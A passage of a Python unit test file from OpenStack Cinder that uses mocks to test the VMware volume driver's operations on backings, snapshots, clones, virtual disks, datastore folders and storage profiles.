task_info = mock.Mock(spec=object)
task_info.result = mock.sentinel.result
self.session.wait_for_task.return_value = task_info
name = 'backing_name'
size_kb = mock.sentinel.size_kb
disk_type = mock.sentinel.disk_type
adapter_type = mock.sentinel.adapter_type
folder = mock.sentinel.folder
resource_pool = mock.sentinel.resource_pool
host = mock.sentinel.host
ds_name = mock.sentinel.ds_name
profile_id = mock.sentinel.profile_id
ret = self.vops.create_backing(name, size_kb, disk_type, folder,
resource_pool, host, ds_name,
profile_id, adapter_type)
self.assertEqual(mock.sentinel.result, ret)
get_create_spec.assert_called_once_with(name, size_kb, disk_type,
ds_name, profile_id,
adapter_type)
self.session.invoke_api.assert_called_once_with(self.session.vim,
'CreateVM_Task',
folder,
config=create_spec,
pool=resource_pool,
host=host)
self.session.wait_for_task.assert_called_once_with(task)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_get_create_spec_disk_less')
def test_create_backing_disk_less(self, get_create_spec_disk_less):
create_spec = mock.sentinel.create_spec
get_create_spec_disk_less.return_value = create_spec
task = mock.sentinel.task
self.session.invoke_api.return_value = task
task_info = mock.Mock(spec=object)
task_info.result = mock.sentinel.result
self.session.wait_for_task.return_value = task_info
name = 'backing_name'
folder = mock.sentinel.folder
resource_pool = mock.sentinel.resource_pool
host = mock.sentinel.host
ds_name = mock.sentinel.ds_name
profile_id = mock.sentinel.profile_id
ret = self.vops.create_backing_disk_less(name, folder, resource_pool,
host, ds_name, profile_id)
self.assertEqual(mock.sentinel.result, ret)
get_create_spec_disk_less.assert_called_once_with(name, ds_name,
profile_id)
self.session.invoke_api.assert_called_once_with(self.session.vim,
'CreateVM_Task',
folder,
config=create_spec,
pool=resource_pool,
host=host)
self.session.wait_for_task.assert_called_once_with(task)
def test_get_datastore(self):
backing = mock.sentinel.backing
datastore = mock.Mock(spec=object)
datastore.ManagedObjectReference = [mock.sentinel.ds]
self.session.invoke_api.return_value = datastore
ret = self.vops.get_datastore(backing)
self.assertEqual(mock.sentinel.ds, ret)
self.session.invoke_api.assert_called_once_with(vim_util,
'get_object_property',
self.session.vim,
backing, 'datastore')
def test_get_summary(self):
datastore = mock.sentinel.datastore
summary = mock.sentinel.summary
self.session.invoke_api.return_value = summary
ret = self.vops.get_summary(datastore)
self.assertEqual(summary, ret)
self.session.invoke_api.assert_called_once_with(vim_util,
'get_object_property',
self.session.vim,
datastore,
'summary')
def test_get_relocate_spec(self):
delete_disk_attribute = True
def _create_side_effect(type):
obj = mock.Mock()
if type == "ns0:VirtualDiskFlatVer2BackingInfo":
del obj.eagerlyScrub
elif (type == "ns0:VirtualMachineRelocateSpec" and
delete_disk_attribute):
del obj.disk
else:
pass
return obj
factory = self.session.vim.client.factory
factory.create.side_effect = _create_side_effect
datastore = mock.sentinel.datastore
resource_pool = mock.sentinel.resource_pool
host = mock.sentinel.host
disk_move_type = mock.sentinel.disk_move_type
ret = self.vops._get_relocate_spec(datastore, resource_pool, host,
disk_move_type)
self.assertEqual(datastore, ret.datastore)
self.assertEqual(resource_pool, ret.pool)
self.assertEqual(host, ret.host)
self.assertEqual(disk_move_type, ret.diskMoveType)
# Test with disk locator.
delete_disk_attribute = False
disk_type = 'thin'
disk_device = mock.Mock()
ret = self.vops._get_relocate_spec(datastore, resource_pool, host,
disk_move_type, disk_type,
disk_device)
factory.create.side_effect = None
self.assertEqual(datastore, ret.datastore)
self.assertEqual(resource_pool, ret.pool)
self.assertEqual(host, ret.host)
self.assertEqual(disk_move_type, ret.diskMoveType)
self.assertIsInstance(ret.disk, list)
self.assertEqual(1, len(ret.disk))
disk_locator = ret.disk[0]
self.assertEqual(datastore, disk_locator.datastore)
self.assertEqual(disk_device.key, disk_locator.diskId)
backing = disk_locator.diskBackingInfo
self.assertIsInstance(backing.thinProvisioned, bool)
self.assertTrue(backing.thinProvisioned)
self.assertEqual('', backing.fileName)
self.assertEqual('persistent', backing.diskMode)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_get_disk_device')
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_get_relocate_spec')
def test_relocate_backing(self, get_relocate_spec, get_disk_device):
disk_device = mock.sentinel.disk_device
get_disk_device.return_value = disk_device
spec = mock.sentinel.relocate_spec
get_relocate_spec.return_value = spec
task = mock.sentinel.task
self.session.invoke_api.return_value = task
backing = mock.sentinel.backing
datastore = mock.sentinel.datastore
resource_pool = mock.sentinel.resource_pool
host = mock.sentinel.host
disk_type = mock.sentinel.disk_type
self.vops.relocate_backing(backing, datastore, resource_pool, host,
disk_type)
# Verify calls
disk_move_type = 'moveAllDiskBackingsAndAllowSharing'
get_disk_device.assert_called_once_with(backing)
get_relocate_spec.assert_called_once_with(datastore, resource_pool,
host, disk_move_type,
disk_type, disk_device)
self.session.invoke_api.assert_called_once_with(self.session.vim,
'RelocateVM_Task',
backing,
spec=spec)
self.session.wait_for_task.assert_called_once_with(task)
def test_move_backing_to_folder(self):
task = mock.sentinel.task
self.session.invoke_api.return_value = task
backing = mock.sentinel.backing
folder = mock.sentinel.folder
self.vops.move_backing_to_folder(backing, folder)
# Verify calls
self.session.invoke_api.assert_called_once_with(self.session.vim,
'MoveIntoFolder_Task',
folder,
list=[backing])
self.session.wait_for_task.assert_called_once_with(task)
def test_create_snapshot_operation(self):
task = mock.sentinel.task
self.session.invoke_api.return_value = task
task_info = mock.Mock(spec=object)
task_info.result = mock.sentinel.result
self.session.wait_for_task.return_value = task_info
backing = mock.sentinel.backing
name = mock.sentinel.name
desc = mock.sentinel.description
quiesce = True
ret = self.vops.create_snapshot(backing, name, desc, quiesce)
self.assertEqual(mock.sentinel.result, ret)
self.session.invoke_api.assert_called_once_with(self.session.vim,
'CreateSnapshot_Task',
backing, name=name,
description=desc,
memory=False,
quiesce=quiesce)
self.session.wait_for_task.assert_called_once_with(task)
def test_get_snapshot_from_tree(self):
volops = volumeops.VMwareVolumeOps
name = mock.sentinel.name
# Test snapshot == 'None'
ret = volops._get_snapshot_from_tree(name, None)
self.assertIsNone(ret)
# Test root == snapshot
snapshot = mock.sentinel.snapshot
node = mock.Mock(spec=object)
node.name = name
node.snapshot = snapshot
ret = volops._get_snapshot_from_tree(name, node)
self.assertEqual(ret, snapshot)
# Test root.childSnapshotList == None
root = mock.Mock(spec=object)
root.name = 'root'
del root.childSnapshotList
ret = volops._get_snapshot_from_tree(name, root)
self.assertIsNone(ret)
# Test root.child == snapshot
root.childSnapshotList = [node]
ret = volops._get_snapshot_from_tree(name, root)
self.assertEqual(ret, snapshot)
def test_get_snapshot(self):
# build out the root snapshot tree
snapshot_name = mock.sentinel.snapshot_name
snapshot = mock.sentinel.snapshot
root = mock.Mock(spec=object)
root.name = 'root'
node = mock.Mock(spec=object)
node.name = snapshot_name
node.snapshot = snapshot
root.childSnapshotList = [node]
# Test rootSnapshotList is not None
snapshot_tree = mock.Mock(spec=object)
snapshot_tree.rootSnapshotList = [root]
self.session.invoke_api.return_value = snapshot_tree
backing = mock.sentinel.backing
ret = self.vops.get_snapshot(backing, snapshot_name)
self.assertEqual(snapshot, ret)
self.session.invoke_api.assert_called_with(vim_util,
'get_object_property',
self.session.vim,
backing,
'snapshot')
# Test rootSnapshotList == None
snapshot_tree.rootSnapshotList = None
ret = self.vops.get_snapshot(backing, snapshot_name)
self.assertIsNone(ret)
self.session.invoke_api.assert_called_with(vim_util,
'get_object_property',
self.session.vim,
backing,
'snapshot')
def test_snapshot_exists(self):
backing = mock.sentinel.backing
invoke_api = self.session.invoke_api
invoke_api.return_value = None
self.assertFalse(self.vops.snapshot_exists(backing))
invoke_api.assert_called_once_with(vim_util,
'get_object_property',
self.session.vim,
backing,
'snapshot')
snapshot = mock.Mock()
invoke_api.return_value = snapshot
snapshot.rootSnapshotList = None
self.assertFalse(self.vops.snapshot_exists(backing))
snapshot.rootSnapshotList = [mock.Mock()]
self.assertTrue(self.vops.snapshot_exists(backing))
def test_delete_snapshot(self):
backing = mock.sentinel.backing
snapshot_name = mock.sentinel.snapshot_name
# Test snapshot is None
with mock.patch.object(self.vops, 'get_snapshot') as get_snapshot:
get_snapshot.return_value = None
self.vops.delete_snapshot(backing, snapshot_name)
get_snapshot.assert_called_once_with(backing, snapshot_name)
# Test snapshot is not None
snapshot = mock.sentinel.snapshot
task = mock.sentinel.task
invoke_api = self.session.invoke_api
invoke_api.return_value = task
with mock.patch.object(self.vops, 'get_snapshot') as get_snapshot:
get_snapshot.return_value = snapshot
self.vops.delete_snapshot(backing, snapshot_name)
get_snapshot.assert_called_with(backing, snapshot_name)
invoke_api.assert_called_once_with(self.session.vim,
'RemoveSnapshot_Task',
snapshot, removeChildren=False)
self.session.wait_for_task.assert_called_once_with(task)
def test_get_folder(self):
folder = mock.sentinel.folder
backing = mock.sentinel.backing
with mock.patch.object(self.vops, '_get_parent') as get_parent:
get_parent.return_value = folder
ret = self.vops._get_folder(backing)
self.assertEqual(folder, ret)
get_parent.assert_called_once_with(backing, 'Folder')
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_get_relocate_spec')
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_get_disk_device')
def test_get_clone_spec(self, get_disk_device, get_relocate_spec):
factory = self.session.vim.client.factory
factory.create.side_effect = lambda *args: mock.Mock()
relocate_spec = mock.sentinel.relocate_spec
get_relocate_spec.return_value = relocate_spec
datastore = mock.sentinel.datastore
disk_move_type = mock.sentinel.disk_move_type
snapshot = mock.sentinel.snapshot
disk_type = None
backing = mock.sentinel.backing
ret = self.vops._get_clone_spec(datastore, disk_move_type, snapshot,
backing, disk_type)
self.assertEqual(relocate_spec, ret.location)
self.assertFalse(ret.powerOn)
self.assertFalse(ret.template)
self.assertEqual(snapshot, ret.snapshot)
get_relocate_spec.assert_called_once_with(datastore, None, None,
disk_move_type, disk_type,
None)
disk_device = mock.sentinel.disk_device
get_disk_device.return_value = disk_device
disk_type = 'thin'
ret = self.vops._get_clone_spec(datastore, disk_move_type, snapshot,
backing, disk_type)
factory.create.side_effect = None
self.assertEqual(relocate_spec, ret.location)
self.assertFalse(ret.powerOn)
self.assertFalse(ret.template)
self.assertEqual(snapshot, ret.snapshot)
get_disk_device.assert_called_once_with(backing)
get_relocate_spec.assert_called_with(datastore, None, None,
disk_move_type, disk_type,
disk_device)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_get_clone_spec')
def test_clone_backing(self, get_clone_spec):
folder = mock.Mock(name='folder', spec=object)
folder._type = 'Folder'
task = mock.sentinel.task
self.session.invoke_api.side_effect = [folder, task, folder, task,
folder, task]
task_info = mock.Mock(spec=object)
task_info.result = mock.sentinel.new_backing
self.session.wait_for_task.return_value = task_info
clone_spec = mock.sentinel.clone_spec
get_clone_spec.return_value = clone_spec
# Test non-linked clone_backing
name = mock.sentinel.name
backing = mock.Mock(spec=object)
backing._type = 'VirtualMachine'
snapshot = mock.sentinel.snapshot
clone_type = "anything-other-than-linked"
datastore = mock.sentinel.datstore
ret = self.vops.clone_backing(name, backing, snapshot, clone_type,
datastore)
# verify calls
self.assertEqual(mock.sentinel.new_backing, ret)
disk_move_type = 'moveAllDiskBackingsAndDisallowSharing'
get_clone_spec.assert_called_with(datastore, disk_move_type, snapshot,
backing, None, None, None)
expected = [mock.call(vim_util, 'get_object_property',
self.session.vim, backing, 'parent'),
mock.call(self.session.vim, 'CloneVM_Task', backing,
folder=folder, name=name, spec=clone_spec)]
self.assertEqual(expected, self.session.invoke_api.mock_calls)
# Test linked clone_backing
clone_type = volumeops.LINKED_CLONE_TYPE
self.session.invoke_api.reset_mock()
ret = self.vops.clone_backing(name, backing, snapshot, clone_type,
datastore)
# verify calls
self.assertEqual(mock.sentinel.new_backing, ret)
disk_move_type = 'createNewChildDiskBacking'
get_clone_spec.assert_called_with(datastore, disk_move_type, snapshot,
backing, None, None, None)
expected = [mock.call(vim_util, 'get_object_property',
self.session.vim, backing, 'parent'),
mock.call(self.session.vim, 'CloneVM_Task', backing,
folder=folder, name=name, spec=clone_spec)]
self.assertEqual(expected, self.session.invoke_api.mock_calls)
# Test disk type conversion and target host.
clone_type = None
disk_type = 'thin'
host = mock.sentinel.host
rp = mock.sentinel.rp
self.session.invoke_api.reset_mock()
ret = self.vops.clone_backing(name, backing, snapshot, clone_type,
datastore, disk_type, host, rp)
self.assertEqual(mock.sentinel.new_backing, ret)
disk_move_type = 'moveAllDiskBackingsAndDisallowSharing'
get_clone_spec.assert_called_with(datastore, disk_move_type, snapshot,
backing, disk_type, host, rp)
expected = [mock.call(vim_util, 'get_object_property',
self.session.vim, backing, 'parent'),
mock.call(self.session.vim, 'CloneVM_Task', backing,
folder=folder, name=name, spec=clone_spec)]
self.assertEqual(expected, self.session.invoke_api.mock_calls)
# Clear side effects.
self.session.invoke_api.side_effect = None
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_create_specs_for_disk_add')
def test_attach_disk_to_backing(self, create_spec):
reconfig_spec = mock.Mock()
self.session.vim.client.factory.create.return_value = reconfig_spec
disk_add_config_specs = mock.Mock()
create_spec.return_value = disk_add_config_specs
task = mock.Mock()
self.session.invoke_api.return_value = task
backing = mock.Mock()
size_in_kb = units.Ki
disk_type = "thin"
adapter_type = "ide"
vmdk_ds_file_path = mock.Mock()
self.vops.attach_disk_to_backing(backing, size_in_kb, disk_type,
adapter_type, vmdk_ds_file_path)
self.assertEqual(disk_add_config_specs, reconfig_spec.deviceChange)
create_spec.assert_called_once_with(size_in_kb, disk_type,
adapter_type,
vmdk_ds_file_path)
self.session.invoke_api.assert_called_once_with(self.session.vim,
"ReconfigVM_Task",
backing,
spec=reconfig_spec)
self.session.wait_for_task.assert_called_once_with(task)
def test_rename_backing(self):
task = mock.sentinel.task
self.session.invoke_api.return_value = task
backing = mock.sentinel.backing
new_name = mock.sentinel.new_name
self.vops.rename_backing(backing, new_name)
self.session.invoke_api.assert_called_once_with(self.session.vim,
"Rename_Task",
backing,
newName=new_name)
self.session.wait_for_task.assert_called_once_with(task)
def test_change_backing_profile(self):
# Test change to empty profile.
reconfig_spec = mock.Mock()
empty_profile_spec = mock.sentinel.empty_profile_spec
self.session.vim.client.factory.create.side_effect = [
reconfig_spec, empty_profile_spec]
task = mock.sentinel.task
self.session.invoke_api.return_value = task
backing = mock.sentinel.backing
unique_profile_id = mock.sentinel.unique_profile_id
profile_id = mock.Mock(uniqueId=unique_profile_id)
self.vops.change_backing_profile(backing, profile_id)
self.assertEqual([empty_profile_spec], reconfig_spec.vmProfile)
self.session.invoke_api.assert_called_once_with(self.session.vim,
"ReconfigVM_Task",
backing,
spec=reconfig_spec)
self.session.wait_for_task.assert_called_once_with(task)
# Test change to non-empty profile.
profile_spec = mock.Mock()
self.session.vim.client.factory.create.side_effect = [
reconfig_spec, profile_spec]
self.session.invoke_api.reset_mock()
self.session.wait_for_task.reset_mock()
self.vops.change_backing_profile(backing, profile_id)
self.assertEqual([profile_spec], reconfig_spec.vmProfile)
self.assertEqual(unique_profile_id,
reconfig_spec.vmProfile[0].profileId)
self.session.invoke_api.assert_called_once_with(self.session.vim,
"ReconfigVM_Task",
backing,
spec=reconfig_spec)
self.session.wait_for_task.assert_called_once_with(task)
# Clear side effects.
self.session.vim.client.factory.create.side_effect = None
def test_delete_file(self):
file_mgr = mock.sentinel.file_manager
self.session.vim.service_content.fileManager = file_mgr
task = mock.sentinel.task
invoke_api = self.session.invoke_api
invoke_api.return_value = task
# Test delete file
file_path = mock.sentinel.file_path
datacenter = mock.sentinel.datacenter
self.vops.delete_file(file_path, datacenter)
# verify calls
invoke_api.assert_called_once_with(self.session.vim,
'DeleteDatastoreFile_Task',
file_mgr,
name=file_path,
datacenter=datacenter)
self.session.wait_for_task.assert_called_once_with(task)
def test_create_datastore_folder(self):
file_manager = mock.sentinel.file_manager
self.session.vim.service_content.fileManager = file_manager
invoke_api = self.session.invoke_api
ds_name = "nfs"
folder_path = "test/"
datacenter = mock.sentinel.datacenter
self.vops.create_datastore_folder(ds_name, folder_path, datacenter)
invoke_api.assert_called_once_with(self.session.vim,
'MakeDirectory',
file_manager,
name="[nfs] test/",
datacenter=datacenter)
def test_create_datastore_folder_with_existing_folder(self):
file_manager = mock.sentinel.file_manager
self.session.vim.service_content.fileManager = file_manager
invoke_api = self.session.invoke_api
invoke_api.side_effect = exceptions.FileAlreadyExistsException
ds_name = "nfs"
folder_path = "test/"
datacenter = mock.sentinel.datacenter
self.vops.create_datastore_folder(ds_name, folder_path, datacenter)
invoke_api.assert_called_once_with(self.session.vim,
'MakeDirectory',
file_manager,
name="[nfs] test/",
datacenter=datacenter)
invoke_api.side_effect = None
def test_create_datastore_folder_with_invoke_api_error(self):
file_manager = mock.sentinel.file_manager
self.session.vim.service_content.fileManager = file_manager
invoke_api = self.session.invoke_api
invoke_api.side_effect = exceptions.VimFaultException(
["FileFault"], "error")
ds_name = "nfs"
folder_path = "test/"
datacenter = mock.sentinel.datacenter
self.assertRaises(exceptions.VimFaultException,
self.vops.create_datastore_folder,
ds_name,
folder_path,
datacenter)
invoke_api.assert_called_once_with(self.session.vim,
'MakeDirectory',
file_manager,
name="[nfs] test/",
datacenter=datacenter)
invoke_api.side_effect = None
def test_get_path_name(self):
path = mock.Mock(spec=object)
path_name = mock.sentinel.vm_path_name
path.vmPathName = path_name
invoke_api = self.session.invoke_api
invoke_api.return_value = path
backing = mock.sentinel.backing
ret = self.vops.get_path_name(backing)
self.assertEqual(path_name, ret)
invoke_api.assert_called_once_with(vim_util, 'get_object_property',
self.session.vim, backing,
'config.files')
def test_get_entity_name(self):
entity_name = mock.sentinel.entity_name
invoke_api = self.session.invoke_api
invoke_api.return_value = entity_name
entity = mock.sentinel.entity
ret = self.vops.get_entity_name(entity)
self.assertEqual(entity_name, ret)
invoke_api.assert_called_once_with(vim_util, 'get_object_property',
self.session.vim, entity, 'name')
def test_get_vmdk_path(self):
# Setup hardware_devices for test
device = mock.Mock()
device.__class__.__name__ = 'VirtualDisk'
backing = mock.Mock()
backing.__class__.__name__ = 'VirtualDiskFlatVer2BackingInfo'
backing.fileName = mock.sentinel.vmdk_path
device.backing = backing
invoke_api = self.session.invoke_api
invoke_api.return_value = [device]
# Test get_vmdk_path
ret = self.vops.get_vmdk_path(backing)
self.assertEqual(mock.sentinel.vmdk_path, ret)
invoke_api.assert_called_once_with(vim_util, 'get_object_property',
self.session.vim, backing,
'config.hardware.device')
backing.__class__.__name__ = ' VirtualDiskSparseVer2BackingInfo'
self.assertRaises(AssertionError, self.vops.get_vmdk_path, backing)
# Test with no disk device.
invoke_api.return_value = []
self.assertRaises(vmdk_exceptions.VirtualDiskNotFoundException,
self.vops.get_vmdk_path,
backing)
def test_get_disk_size(self):
# Test with valid disk device.
device = mock.Mock()
device.__class__.__name__ = 'VirtualDisk'
disk_size_bytes = 1024
device.capacityInKB = disk_size_bytes / units.Ki
invoke_api = self.session.invoke_api
invoke_api.return_value = [device]
self.assertEqual(disk_size_bytes,
self.vops.get_disk_size(mock.sentinel.backing))
# Test with no disk device.
invoke_api.return_value = []
self.assertRaises(vmdk_exceptions.VirtualDiskNotFoundException,
self.vops.get_disk_size,
mock.sentinel.backing)
def test_create_virtual_disk(self):
task = mock.Mock()
invoke_api = self.session.invoke_api
invoke_api.return_value = task
spec = mock.Mock()
factory = self.session.vim.client.factory
factory.create.return_value = spec
disk_mgr = self.session.vim.service_content.virtualDiskManager
dc_ref = mock.Mock()
vmdk_ds_file_path = mock.Mock()
size_in_kb = 1024
adapter_type = 'ide'
disk_type = 'thick'
self.vops.create_virtual_disk(dc_ref, vmdk_ds_file_path, size_in_kb,
adapter_type, disk_type)
self.assertEqual(volumeops.VirtualDiskAdapterType.IDE,
spec.adapterType)
self.assertEqual(volumeops.VirtualDiskType.PREALLOCATED, spec.diskType)
self.assertEqual(size_in_kb, spec.capacityKb)
invoke_api.assert_called_once_with(self.session.vim,
'CreateVirtualDisk_Task',
disk_mgr,
name=vmdk_ds_file_path,
datacenter=dc_ref,
spec=spec)
self.session.wait_for_task.assert_called_once_with(task)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'create_virtual_disk')
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'delete_file')
def test_create_flat_extent_virtual_disk_descriptor(self, delete_file,
create_virtual_disk):
dc_ref = mock.Mock()
path = mock.Mock()
size_in_kb = 1024
adapter_type = 'ide'
disk_type = 'thick'
self.vops.create_flat_extent_virtual_disk_descriptor(dc_ref,
path,
size_in_kb,
adapter_type,
disk_type)
create_virtual_disk.assert_called_once_with(
dc_ref, path.get_descriptor_ds_file_path(), size_in_kb,
adapter_type, disk_type)
delete_file.assert_called_once_with(
path.get_flat_extent_ds_file_path(), dc_ref)
def test_copy_vmdk_file(self):
task = mock.sentinel.task
invoke_api = self.session.invoke_api
invoke_api.return_value = task
disk_mgr = self.session.vim.service_content.virtualDiskManager
src_dc_ref = mock.sentinel.src_dc_ref
src_vmdk_file_path = mock.sentinel.src_vmdk_file_path
dest_dc_ref = mock.sentinel.dest_dc_ref
dest_vmdk_file_path = mock.sentinel.dest_vmdk_file_path
self.vops.copy_vmdk_file(src_dc_ref, src_vmdk_file_path,
dest_vmdk_file_path, dest_dc_ref)
invoke_api.assert_called_once_with(self.session.vim,
'CopyVirtualDisk_Task',
disk_mgr,
sourceName=src_vmdk_file_path,
sourceDatacenter=src_dc_ref,
destName=dest_vmdk_file_path,
destDatacenter=dest_dc_ref,
force=True)
self.session.wait_for_task.assert_called_once_with(task)
def test_copy_vmdk_file_with_default_dest_datacenter(self):
task = mock.sentinel.task
invoke_api = self.session.invoke_api
invoke_api.return_value = task
disk_mgr = self.session.vim.service_content.virtualDiskManager
src_dc_ref = mock.sentinel.src_dc_ref
src_vmdk_file_path = mock.sentinel.src_vmdk_file_path
dest_vmdk_file_path = mock.sentinel.dest_vmdk_file_path
self.vops.copy_vmdk_file(src_dc_ref, src_vmdk_file_path,
dest_vmdk_file_path)
invoke_api.assert_called_once_with(self.session.vim,
'CopyVirtualDisk_Task',
disk_mgr,
sourceName=src_vmdk_file_path,
sourceDatacenter=src_dc_ref,
destName=dest_vmdk_file_path,
destDatacenter=src_dc_ref,
force=True)
self.session.wait_for_task.assert_called_once_with(task)
def test_delete_vmdk_file(self):
task = mock.sentinel.task
invoke_api = self.session.invoke_api
invoke_api.return_value = task
disk_mgr = self.session.vim.service_content.virtualDiskManager
dc_ref = self.session.dc_ref
vmdk_file_path = self.session.vmdk_file
self.vops.delete_vmdk_file(vmdk_file_path, dc_ref)
invoke_api.assert_called_once_with(self.session.vim,
'DeleteVirtualDisk_Task',
disk_mgr,
name=vmdk_file_path,
datacenter=dc_ref)
self.session.wait_for_task.assert_called_once_with(task)
def test_get_profile(self):
server_obj = mock.Mock()
self.session.pbm.client.factory.create.return_value = server_obj
profile_ids = [mock.sentinel.profile_id]
profile_name = mock.sentinel.profile_name
profile = mock.Mock()
profile.name = profile_name
self.session.invoke_api.side_effect = [profile_ids, [profile]]
value = mock.sentinel.value
backing = mock.Mock(value=value)
self.assertEqual(profile_name, self.vops.get_profile(backing))
pbm = self.session.pbm
profile_manager = pbm.service_content.profileManager
exp_calls = [mock.call(pbm, 'PbmQueryAssociatedProfile',
profile_manager, entity=server_obj),
mock.call(pbm, 'PbmRetrieveContent', profile_manager,
profileIds=profile_ids)]
self.assertEqual(exp_calls, self.session.invoke_api.call_args_list)
self.assertEqual(value, server_obj.key)
self.assertEqual('virtualMachine', server_obj.objectType)
self.session.invoke_api.side_effect = None
def test_get_profile_with_no_profile(self):
server_obj = mock.Mock()
self.session.pbm.client.factory.create.return_value = server_obj
self.session.invoke_api.side_effect = [[]]
value = mock.sentinel.value
backing = mock.Mock(value=value)
self.assertIsNone(self.vops.get_profile(backing))
pbm = self.session.pbm
profile_manager = pbm.service_content.profileManager
exp_calls = [mock.call(pbm, 'PbmQueryAssociatedProfile',
profile_manager, entity=server_obj)]
self.assertEqual(exp_calls, self.session.invoke_api.call_args_list)
self.assertEqual(value, server_obj.key)
self.assertEqual('virtualMachine', server_obj.objectType)
self.session.invoke_api.side_effect = None
def test_extend_virtual_disk(self):
"""Test volumeops.extend_virtual_disk."""
task = mock.sentinel.task
invoke_api = self.session.invoke_api
invoke_api.return_value = task
disk_mgr = self.session.vim.service_content.virtualDiskManager
fake_size = 5
fake_size_in_kb = fake_size * units.Mi
fake_name = 'fake_volume_0000000001'
fake_dc = mock.sentinel.datacenter
self.vops.extend_virtual_disk(fake_size,
fake_name, fake_dc)
invoke_api.assert_called_once_with(self.session.vim,
"ExtendVirtualDisk_Task",
disk_mgr,
name=fake_name,
datacenter=fake_dc,
newCapacityKb=fake_size_in_kb,
eagerZero=False)
self.session.wait_for_task.assert_called_once_with(task)
class VirtualDiskPathTest(test.TestCase):
"""Unit tests for VirtualDiskPath."""
def setUp(self):
super(VirtualDiskPathTest, self).setUp()
self._path = volumeops.VirtualDiskPath("nfs", "A/B/", "disk")
def test_get_datastore_file_path(self):
self.assertEqual("[nfs] A/B/disk.vmdk",
self._path.get_datastore_file_path("nfs",
"A/B/disk.vmdk"))
def test_get_descriptor_file_path(self):
self.assertEqual("A/B/disk.vmdk",
self._path.get_descriptor_file_path())
def test_get_descriptor_ds_file_path(self):
self.assertEqual("[nfs] A/B/disk.vmdk",
self._path.get_descriptor_ds_file_path())
class FlatExtentVirtualDiskPathTest(test.TestCase):
"""Unit tests for FlatExtentVirtualDiskPath."""
def setUp(self):
super(FlatExtentVirtualDiskPathTest, self).setUp()
self._path = volumeops.FlatExtentVirtualDiskPath("nfs", "A/B/", "disk")
def test_get_flat_extent_file_path(self):
self.assertEqual("A/B/disk-flat.vmdk",
self._path.get_flat_extent_file_path())
def test_get_flat_extent_ds_file_path(self):
self.assertEqual("[nfs] A/B/disk-flat.vmdk",
self._path.get_flat_extent_ds_file_path())
class VirtualDiskTypeTest(test.TestCase):
"""Unit tests for VirtualDiskType."""
def test_is_valid(self):
self.assertTrue(volumeops.VirtualDiskType.is_valid("thick"))
self.assertTrue(volumeops.VirtualDiskType.is_valid("thin"))
self.assertTrue(volumeops.VirtualDiskType.is_valid("eagerZeroedThick"))
self.assertFalse(volumeops.VirtualDiskType.is_valid("preallocated"))
def test_validate(self):
volumeops.VirtualDiskType.validate("thick")
volumeops.VirtualDiskType.validate("thin")
volumeops.VirtualDiskType.validate("eagerZeroedThick")
self.assertRaises(vmdk_exceptions.InvalidDiskTypeException,
volumeops.VirtualDiskType.validate,
"preallocated")
def test_get_virtual_disk_type(self):
self.assertEqual("preallocated",
volumeops.VirtualDiskType.get_virtual_disk_type(
"thick"))
self.assertEqual("thin",
volumeops.VirtualDiskType.get_virtual_disk_type(
"thin"))
self.assertEqual("eagerZeroedThick",
volumeops.VirtualDiskType.get_virtual_disk_type(
"eagerZeroedThick"))
self.assertRaises(vmdk_exceptions.InvalidDiskTypeException,
volumeops.VirtualDiskType.get_virtual_disk_type,
"preallocated")
class VirtualDiskAdapterTypeTest(test.TestCase):
"""Unit tests for VirtualDiskAdapterType."""
def test_is_valid(self):
self.assertTrue(volumeops.VirtualDiskAdapterType.is_valid("lsiLogic"))
self.assertTrue(volumeops.VirtualDiskAdapterType.is_valid("busLogic"))
self.assertTrue(volumeops.VirtualDiskAdapterType.is_valid(
"lsiLogicsas"))
self.assertTrue(volumeops.VirtualDiskAdapterType.is_valid("ide"))
self.assertFalse(volumeops.VirtualDiskAdapterType.is_valid("pvscsi"))
def test_validate(self):
volumeops.VirtualDiskAdapterType.validate("lsiLogic")
volumeops.VirtualDiskAdapterType.validate("busLogic")
volumeops.VirtualDiskAdapterType.validate("lsiLogicsas")
volumeops.VirtualDiskAdapterType.validate("ide")
self.assertRaises(vmdk_exceptions.InvalidAdapterTypeException,
volumeops.VirtualDiskAdapterType.validate,
"pvscsi")
def test_get_adapter_type(self):
self.assertEqual("lsiLogic",
volumeops.VirtualDiskAdapterType.get_adapter_type(
"lsiLogic"))
self.assertEqual("busLogic",
volumeops.VirtualDiskAdapterType.get_adapter_type(
"busLogic"))
self.assertEqual("lsiLogic",
volumeops.VirtualDiskAdapterType.get_adapter_type(
"lsiLogicsas"))
self.assertEqual("ide",
volumeops.VirtualDiskAdapterType.get_adapter_type(
"ide"))
self.assertRaises(vmdk_exceptions.InvalidAdapterTypeException,
volumeops.VirtualDiskAdapterType.get_adapter_type,
"pvscsi")
class ControllerTypeTest(test.TestCase):
"""Unit tests for ControllerType."""
def test_get_controller_type(self):
self.assertEqual(volumeops.ControllerType.LSI_LOGIC,
volumeops.ControllerType.get_controller_type(
'lsiLogic'))
self.assertEqual(volumeops.ControllerType.BUS_LOGIC,
volumeops.ControllerType.get_controller_type(
'busLogic'))
self.assertEqual(volumeops.ControllerType.LSI_LOGIC_SAS,
volumeops.ControllerType.get_controller_type(
'lsiLogicsas'))
self.assertEqual(volumeops.ControllerType.IDE,
volumeops.ControllerType.get_controller_type(
'ide'))
self.assertRaises(vmdk_exceptions.InvalidAdapterTypeException,
volumeops.ControllerType.get_controller_type,
'invalid_type')
def test_is_scsi_controller(self):
self.assertTrue(volumeops.ControllerType.is_scsi_controller(
volumeops.ControllerType.LSI_LOGIC))
self.assertTrue(volumeops.ControllerType.is_scsi_controller(
volumeops.ControllerType.BUS_LOGIC))
self.assertTrue(volumeops.ControllerType.is_scsi_controller(
volumeops.ControllerType.LSI_LOGIC_SAS))
self.assertFalse(volumeops.ControllerType.is_scsi_controller(
volumeops.ControllerType.IDE))
| rakeshmi/cinder | cinder/tests/unit/test_vmware_volumeops.py | Python | apache-2.0 | 73,767 |
